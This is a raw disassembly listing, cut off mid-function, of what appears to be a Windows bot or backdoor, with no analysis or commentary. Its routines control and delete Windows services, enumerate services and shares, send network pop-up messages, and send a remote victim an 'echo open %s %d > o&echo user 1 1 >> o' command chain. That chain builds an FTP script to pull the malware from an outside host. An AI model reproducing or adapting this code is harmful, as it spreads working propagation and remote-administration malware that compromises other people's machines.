movzx eax, word ptr dword_4E3F28
add esp, 18h
push esi
push esi
push eax
push dword ptr [ebp+8]
call sub_40AFA9
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1A0h]
push edi
push eax
call __snprintf
add esp, 1Ch
lea eax, [ebp-1A0h]
push 0
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-1A0h]
push eax
push dword ptr [ebp+0C4h]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_419480
loc_41947C: ; CODE XREF: .text:004193CF�j
; .text:004193E5�j
xor al, al
jmp short loc_4194A4
; ---------------------------------------------------------------------------
loc_419480: ; CODE XREF: .text:0041947A�j
push 0
lea eax, [ebp-5A0h]
push ebx
push eax
push dword ptr [ebp+0C4h]
call dword_4E4238 ; recv
push dword ptr [ebp+0C4h]
call dword_4E42B8 ; closesocket
mov al, 1
loc_4194A4: ; CODE XREF: .text:0041947E�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4194A9(char *Source,int,int)
sub_4194A9 proc near ; CODE XREF: sub_401CC7+574C�p
Dest = word ptr -1C0h
var_15C = byte ptr -15Ch
Str = word ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4F63D0 ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_4194FF
cmp [ebp+var_8C], 0
jnz short loc_4194E8
push 1
pop eax
cmp [ebp+var_84], eax
jnz short loc_4194FF
leave
retn
; ---------------------------------------------------------------------------
loc_4194E8: ; CODE XREF: sub_4194A9+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_4194FA
cmp [ebp+var_8C], 5Ah
jnz short loc_4194FF
loc_4194FA: ; CODE XREF: sub_4194A9+46�j
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4194FF: ; CODE XREF: sub_4194A9+27�j
; sub_4194A9+3B�j ...
push esi
push edi
push offset aNetapi32_dll_0 ; "netapi32.dll"
call ds:dword_4F63C0 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebu_0 ; "NetMessageBufferSend"
push esi
call ds:dword_4F63C4 ; GetProcAddress
push 32h ; MaxCount
mov edi, eax
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+var_15C]
push [ebp+arg_4] ; Source
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+Str]
push [ebp+arg_8] ; Source
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
shl eax, 1
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call ds:dword_4F6440 ; FreeLibrary
mov eax, edi
pop edi
pop esi
leave
retn
sub_4194A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419589 proc near ; CODE XREF: sub_401317+F7�p
; sub_40F181+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_43D4D8
call __ftol
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_419589 endp
; =============== S U B R O U T I N E =======================================
sub_4195C6 proc near ; CODE XREF: sub_401CC7+463E�p
; sub_401CC7+4692�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_41961E
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_450EA8[esi]
push edi
push eax
call sub_419640
add esp, 14h
test eax, eax
jnz short loc_41960E
push edi
push off_450EA4[esi]
push offset asc_450F68 ; "-"
loc_4195FE: ; CODE XREF: sub_4195C6+56�j
mov esi, offset byte_4F4384
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_41963B
; ---------------------------------------------------------------------------
loc_41960E: ; CODE XREF: sub_4195C6+2A�j
push eax
call sub_4196E2
pop ecx
push eax
push edi
push offset unk_450F84
jmp short loc_4195FE
; ---------------------------------------------------------------------------
loc_41961E: ; CODE XREF: sub_4195C6+C�j
lea eax, [eax+eax*2]
mov esi, offset byte_4F4384
push off_450EA0[eax*4]
push offset asc_450FB0 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_41963B: ; CODE XREF: sub_4195C6+46�j
mov eax, esi
pop edi
pop esi
retn
sub_4195C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419640 proc near ; CODE XREF: sub_4195C6+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_4E4214 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_419667
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4196DC
; ---------------------------------------------------------------------------
loc_419667: ; CODE XREF: sub_419640+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4E40FC ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_419687
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4196D4
; ---------------------------------------------------------------------------
loc_419687: ; CODE XREF: sub_419640+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_4196BA
cmp eax, 3
jz short loc_4196AB
jle short loc_4196CD
cmp eax, 6
jg short loc_4196CD
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4E4168 ; ControlService
jmp short loc_4196C1
; ---------------------------------------------------------------------------
loc_4196AB: ; CODE XREF: sub_419640+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4E4104 ; StartServiceA
jmp short loc_4196C1
; ---------------------------------------------------------------------------
loc_4196BA: ; CODE XREF: sub_419640+4D�j
push esi
call dword_4E416C ; DeleteService
loc_4196C1: ; CODE XREF: sub_419640+69�j
; sub_419640+78�j
test eax, eax
jnz short loc_4196CD
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov ebx, eax
loc_4196CD: ; CODE XREF: sub_419640+54�j
; sub_419640+59�j ...
push esi
call dword_4E4118 ; CloseServiceHandle
loc_4196D4: ; CODE XREF: sub_419640+45�j
push edi
call dword_4E4118 ; CloseServiceHandle
pop esi
loc_4196DC: ; CODE XREF: sub_419640+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_419640 endp
; =============== S U B R O U T I N E =======================================
sub_4196E2 proc near ; CODE XREF: sub_4195C6+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_419797
jz loc_419790
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_41975A
jz short loc_419750
mov ecx, eax
sub ecx, 3
jz short loc_419746
dec ecx
dec ecx
jz short loc_41973C
dec ecx
jz short loc_419732
sub ecx, 51h
jz short loc_419728
sub ecx, 24h
jnz loc_41980D ; default
; jumptable 004197B4 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_419728: ; CODE XREF: sub_4196E2+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_419732: ; CODE XREF: sub_4196E2+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_41973C: ; CODE XREF: sub_4196E2+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_419746: ; CODE XREF: sub_4196E2+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_419750: ; CODE XREF: sub_4196E2+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_41975A: ; CODE XREF: sub_4196E2+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_419789
dec ecx
jz short loc_419782
dec ecx
jz short loc_41977B
dec ecx
jnz loc_41980D ; default
; jumptable 004197B4 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_4197FF
; ---------------------------------------------------------------------------
loc_41977B: ; CODE XREF: sub_4196E2+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_419782: ; CODE XREF: sub_4196E2+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_419789: ; CODE XREF: sub_4196E2+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_419790: ; CODE XREF: sub_4196E2+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_419797: ; CODE XREF: sub_4196E2+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_41980D ; default
; jumptable 004197B4 cases 1,5,6,8,9,12,13,15,16
jz short loc_4197FA
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_41980D ; default
; jumptable 004197B4 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_41984E[ecx]
jmp ds:off_419826[ecx*4] ; switch jump
loc_4197BB: ; DATA XREF: .text:off_419826�o
push offset aTheSpecifiedDa ; jumptable 004197B4 case 7
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197C2: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceDepe ; jumptable 004197B4 case 17
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197C9: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceDe_0 ; jumptable 004197B4 case 10
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197D0: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceHasB ; jumptable 004197B4 case 0
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197D7: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheSpecified_0 ; jumptable 004197B4 case 2
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197DE: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceCoul ; jumptable 004197B4 case 11
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197E5: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceHa_0 ; jumptable 004197B4 case 14
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197EC: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheRequested_1 ; jumptable 004197B4 case 3
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197F3: ; CODE XREF: sub_4196E2+D2�j
; DATA XREF: .text:off_419826�o
push offset aTheServiceHasN ; jumptable 004197B4 case 4
jmp short loc_4197FF
; ---------------------------------------------------------------------------
loc_4197FA: ; CODE XREF: sub_4196E2+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_4197FF: ; CODE XREF: sub_4196E2+41�j
; sub_4196E2+4B�j ...
push offset byte_4F3CC4 ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_419820
; ---------------------------------------------------------------------------
loc_41980D: ; CODE XREF: sub_4196E2+36�j
; sub_4196E2+89�j ...
push eax ; default
; jumptable 004197B4 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset byte_4F3CC4 ; Dest
call _sprintf
add esp, 0Ch
loc_419820: ; CODE XREF: sub_4196E2+129�j
mov eax, offset byte_4F3CC4
retn
sub_4196E2 endp
; ---------------------------------------------------------------------------
off_419826 dd offset loc_4197D0 ; DATA XREF: sub_4196E2+D2�r
dd offset loc_4197D7 ; jump table for switch statement
dd offset loc_4197EC
dd offset loc_4197F3
dd offset loc_4197BB
dd offset loc_4197C9
dd offset loc_4197DE
dd offset loc_4197E5
dd offset loc_4197C2
dd offset loc_41980D
byte_41984E db 0, 9, 1, 2 ; DATA XREF: sub_4196E2+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419860(int,char *Str,int)
sub_419860 proc near ; CODE XREF: sub_401CC7+465C�p
var_38C = dword ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4E4214 ; OpenSCManagerA
push ebx ; int
mov [ebp+var_C], eax
push [ebp+arg_8] ; int
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_419898: ; CODE XREF: sub_419860+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4E41E0 ; EnumServicesStatusA
test eax, eax
jnz short loc_4198D2
call ds:dword_4F6394 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_419986
loc_4198D2: ; CODE XREF: sub_419860+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_41997D
lea esi, [ebp+var_188]
loc_4198E3: ; CODE XREF: sub_419860+117�j
mov eax, [esi+8]
dec eax
jz short loc_41992C
dec eax
jz short loc_419925
dec eax
jz short loc_41991E
dec eax
jz short loc_419917
dec eax
jz short loc_419910
dec eax
jz short loc_419909
dec eax
jz short loc_419902
push offset aUnknown_0 ; " Unknown"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_419902: ; CODE XREF: sub_419860+99�j
push offset aPaused ; " Paused"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_419860+96�j
push offset aPausing ; " Pausing"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_419910: ; CODE XREF: sub_419860+93�j
push offset aContinuing ; " Continuing"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_419917: ; CODE XREF: sub_419860+90�j
push offset aRunning ; " Running"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_41991E: ; CODE XREF: sub_419860+8D�j
push offset aStoping ; " Stoping"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_419925: ; CODE XREF: sub_419860+8A�j
push offset aStarting ; " Starting"
jmp short loc_419931
; ---------------------------------------------------------------------------
loc_41992C: ; CODE XREF: sub_419860+87�j
push offset aStopped ; " Stopped"
loc_419931: ; CODE XREF: sub_419860+A0�j
; sub_419860+A7�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dest]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_2 ; "%s: %s (%s)"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+var_38C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_4198E3
loc_41997D: ; CODE XREF: sub_419860+77�j
cmp [ebp+var_8], ebx
jnz loc_419898
loc_419986: ; CODE XREF: sub_419860+6C�j
push [ebp+var_C]
call dword_4E4118 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_419860 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41999D(int,char *Str,int)
sub_41999D proc near ; CODE XREF: sub_401CC7+4740�p
; sub_401CC7+475E�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Str]
test edi, edi
jz loc_419A37
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_4199C6
dec eax
jnz short loc_419A17
push edi
push 0
call sub_419B70
pop ecx
pop ecx
jmp short loc_419A13
; ---------------------------------------------------------------------------
loc_4199C6: ; CODE XREF: sub_41999D+18�j
cmp [ebp+arg_8], 0
jnz short loc_419A05
push 24h ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_419A05
push 57h
pop eax
loc_4199DD: ; CODE XREF: sub_41999D+78�j
push eax
call sub_41A364
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4F3F80
push off_450EA0[eax*4]
push offset asc_451528 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_419A57
; ---------------------------------------------------------------------------
loc_419A05: ; CODE XREF: sub_41999D+2D�j
; sub_41999D+3B�j
push [ebp+arg_8] ; int
push edi ; Str
push 0 ; int
call sub_419AC4
add esp, 0Ch
loc_419A13: ; CODE XREF: sub_41999D+27�j
test eax, eax
jnz short loc_4199DD
loc_419A17: ; CODE XREF: sub_41999D+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4F3F80
push off_450EA4[eax*4]
push offset asc_45150C ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_419A57
; ---------------------------------------------------------------------------
loc_419A37: ; CODE XREF: sub_41999D+A�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4F3F80
lea eax, [eax+eax*2]
push off_450EA0[eax*4]
push offset asc_451554 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_419A57: ; CODE XREF: sub_41999D+66�j
; sub_41999D+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_41999D endp
; =============== S U B R O U T I N E =======================================
sub_419A5D proc near ; CODE XREF: sub_41AD95+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_419A6A
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419A6A: ; CODE XREF: sub_419A5D+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_4F6484
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_4F4180, 1
mov ebp, eax
jnz short loc_419AA7
or byte_4F4180, 1
lea eax, [ebp+1]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov dword_4F3F20, eax
loc_419AA7: ; CODE XREF: sub_419A5D+32�j
push esi
push esi
push ebp
push dword_4F3F20
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4F3F20
pop edi
pop ebp
pop ebx
pop esi
retn
sub_419A5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419AC4(int,char *Str,int)
sub_419AC4 proc near ; CODE XREF: sub_41999D+6E�p
; sub_41B0B9+184�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_419B2F
push [ebp+Str]
mov edi, eax
call sub_419B2F
push 24h ; Val
mov [ebp+var_20], eax
push [ebp+Str] ; Str
call _strchr
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_419B2F
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_4E4114
pop edi
leave
retn
sub_419AC4 endp
; =============== S U B R O U T I N E =======================================
sub_419B2F proc near ; CODE XREF: sub_419AC4+A�p
; sub_419AC4+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_419B3C
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419B3C: ; CODE XREF: sub_419B2F+9�j
push ebx
push esi
mov esi, ds:dword_4F6488
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_419B2F endp
; =============== S U B R O U T I N E =======================================
sub_419B70 proc near ; CODE XREF: sub_41999D+20�p
; sub_41AD95+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419B2F
push [esp+8+arg_4]
mov esi, eax
call sub_419B2F
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4E40EC
pop esi
retn
sub_419B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419B93(int,char *Str,int,int)
sub_419B93 proc near ; CODE XREF: sub_401CC7+477E�p
Dest = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_419B2F
xor esi, esi
mov [ebp+var_C], eax
push esi ; int
mov [ebp+arg_C], esi
push [ebp+arg_8] ; int
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 18h
loc_419BCC: ; CODE XREF: sub_419B93+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_4E4164
mov ebx, eax
cmp ebx, esi
jz short loc_419C2F
cmp ebx, 0EAh
jz short loc_419C2F
push ebx
push ebx
call sub_41A364
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_4515D0 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 24h
jmp short loc_419C9C
; ---------------------------------------------------------------------------
loc_419C2F: ; CODE XREF: sub_419B93+5D�j
; sub_419B93+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_419C93
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_419C3D: ; CODE XREF: sub_419B93+FC�j
push dword ptr [esi+10h]
call dword_4E4108 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_419C54
mov eax, offset aNo ; "No"
loc_419C54: ; CODE XREF: sub_419B93+BA�j
push eax
lea eax, [ebp+Dest]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_419C3D
xor esi, esi
loc_419C93: ; CODE XREF: sub_419B93+A2�j
push [ebp+var_4]
call dword_4E42B0
loc_419C9C: ; CODE XREF: sub_419B93+9A�j
cmp ebx, 0EAh
jz loc_419BCC
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_419B93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CB4 proc near ; CODE XREF: sub_401CC7+47D2�p
; sub_401CC7+47FF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_419D59
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_419CF6
dec eax
jz short loc_419CEB
dec eax
jnz short loc_419D11
push [ebp+arg_14] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push ebx ; int
push edi ; int
call sub_419DFB
add esp, 14h
jmp short loc_419D0D
; ---------------------------------------------------------------------------
loc_419CEB: ; CODE XREF: sub_419CB4+1D�j
push ebx
push edi
call sub_419DDA
pop ecx
pop ecx
jmp short loc_419D0D
; ---------------------------------------------------------------------------
loc_419CF6: ; CODE XREF: sub_419CB4+1A�j
cmp [ebp+arg_8], edi
jz short loc_419D0A
push [ebp+arg_8]
push ebx
push edi
call sub_419D80
add esp, 0Ch
jmp short loc_419D0D
; ---------------------------------------------------------------------------
loc_419D0A: ; CODE XREF: sub_419CB4+45�j
push 57h
pop eax
loc_419D0D: ; CODE XREF: sub_419CB4+35�j
; sub_419CB4+40�j ...
cmp eax, edi
jnz short loc_419D31
loc_419D11: ; CODE XREF: sub_419CB4+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4F4184
push off_450EA4[eax*4]
push offset asc_4515F8 ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_419D79
; ---------------------------------------------------------------------------
loc_419D31: ; CODE XREF: sub_419CB4+5B�j
push eax
call sub_41A364
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4F4184
push off_450EA0[eax*4]
push offset asc_451618 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_419D79
; ---------------------------------------------------------------------------
loc_419D59: ; CODE XREF: sub_419CB4+D�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4F4184
lea eax, [eax+eax*2]
push off_450EA0[eax*4]
push offset asc_451648 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_419D79: ; CODE XREF: sub_419CB4+7B�j
; sub_419CB4+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419CB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D80 proc near ; CODE XREF: sub_419CB4+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_419B2F
push [ebp+arg_4]
mov edi, eax
call sub_419B2F
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_419B2F
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4E40F8
pop edi
leave
retn
sub_419D80 endp
; =============== S U B R O U T I N E =======================================
sub_419DDA proc near ; CODE XREF: sub_419CB4+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419B2F
push [esp+8+arg_4]
mov esi, eax
call sub_419B2F
pop ecx
pop ecx
push eax
push esi
